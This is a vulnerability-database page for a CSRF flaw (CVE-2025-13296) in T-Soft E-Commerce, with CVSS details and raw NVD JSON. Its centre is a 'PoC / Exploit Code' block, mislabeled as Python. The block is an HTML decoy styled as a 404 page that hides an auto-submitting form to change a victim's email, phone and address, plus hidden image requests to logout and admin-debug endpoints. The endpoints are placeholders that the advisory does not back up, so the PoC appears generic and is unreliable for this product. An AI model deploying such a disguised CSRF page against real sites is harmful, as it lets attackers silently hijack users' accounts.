Security Vulnerability Report
中文
CVE-2025-13296 CVSS 5.4 MEDIUM

CVE-2025-13296

Published: 2025-12-01 12:15:46
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Cross-Site Request Forgery (CSRF) vulnerability in Tekrom Technology Inc. T-Soft E-Commerce allows Cross Site Request Forgery.This issue affects T-Soft E-Commerce: through 28112025.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

T-Soft E-Commerce <= 28112025

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-13296: T-Soft E-Commerce CSRF Vulnerability --> <!-- This PoC demonstrates how an attacker can exploit the CSRF vulnerability --> <!-- to modify user account settings without the user's knowledge --> <!DOCTYPE html> <html> <head> <title>404 - Page Not Found</title> <style> body { font-family: Arial, sans-serif; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; background: #f5f5f5; } .container { text-align: center; padding: 40px; background: white; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); } h1 { color: #333; } p { color: #666; } </style> </head> <body> <div class="container"> <h1>404 - Page Not Found</h1> <p>The page you are looking for might have been removed.</p> </div> <!-- Hidden CSRF attack form - auto-submits on page load --> <!-- Target: T-Soft E-Commerce user profile modification endpoint --> <form id="csrfAttack" action="https://target-site.com/tsoft/user/profile/update" method="POST" style="display: none;"> <!-- Set CSRF token to null to test if validation is missing --> <input type="hidden" name="csrf_token" value="" /> <!-- User profile fields that can be modified via CSRF --> <input type="hidden" name="email" value="[email protected]" /> <input type="hidden" name="phone" value="+1234567890" /> <input type="hidden" name="address" value="Modified via CSRF attack" /> <!-- Additional sensitive fields --> <input type="hidden" name="action" value="update_profile" /> </form> <script> // Auto-submit the form when page loads // This simulates the CSRF attack without user awareness window.onload = function() { // In a real attack, this would be hidden and automatic // document.getElementById('csrfAttack').submit(); console.log('CSRF PoC loaded - form ready for submission'); }; </script> </body> </html> <!-- Alternative PoC: Image-based CSRF (GET request) --> <!-- <img src="https://target-site.com/tsoft/api/user/logout" width="0" height="0" border="0"> <img src="https://target-site.com/tsoft/admin/settings?enable_debug=1" width="0" height="0"> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13296", "sourceIdentifier": "[email protected]", "published": "2025-12-01T12:15:45.900", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Tekrom Technology Inc. T-Soft E-Commerce allows Cross Site Request Forgery.This issue affects T-Soft E-Commerce: through 28112025."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0421", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.